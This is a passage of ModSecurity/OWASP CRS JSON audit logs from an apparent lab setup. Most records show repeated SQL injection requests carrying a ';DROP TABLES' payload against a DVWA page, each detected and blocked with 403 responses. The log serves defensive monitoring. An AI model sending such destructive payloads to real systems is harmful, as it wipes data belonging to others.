(Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2038AAQEAAAmHBJ4AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2038AAQEAAAmHBJ4AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2038AAQEAAAmHBJ4AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2038AAQEAAAmHBJ4AAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":539,"p2":2986,"p3":0,"p4":0,"p5":250,"sr":21,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:49 --0400","transaction_id":"WRc21X8AAQEAAAmHBJ8AAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=95","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21X8AAQEAAAmHBJ8AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21X8AAQEAAAmHBJ8AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21X8AAQEAAAmHBJ8AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21X8AAQEAAAmHBJ8AAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":587,"p2":3290,"p3":0,"p4":0,"p5":219,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:50 --0400","transaction_id":"WRc21n8AAQEAAAmHBKAAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=94","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21n8AAQEAAAmHBKAAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21n8AAQEAAAmHBKAAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21n8AAQEAAAmHBKAAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc21n8AAQEAAAmHBKAAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":521,"p2":2383,"p3":0,"p4":0,"p5":146,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:52 --0400","transaction_id":"WRc22H8AAQEAAAmHBKEAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=93","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc22H8AAQEAAAmHBKEAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc22H8AAQEAAAmHBKEAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc22H8AAQEAAAmHBKEAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc22H8AAQEAAAmHBKEAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":414,"p2":2600,"p3":0,"p4":0,"p5":174,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:03 --0400","transaction_id":"WRc24n8AAQEAAAkW4SAAAAAB","remote_address":"127.0.0.1","remote_port":42184,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:38:35 GMT","If-None-Match":"\"26d-54f6a7404e88e\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:40:00 GMT","ETag":"\"294-54f6a791bc669\"","Accept-Ranges":"bytes","Content-Length":"660","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
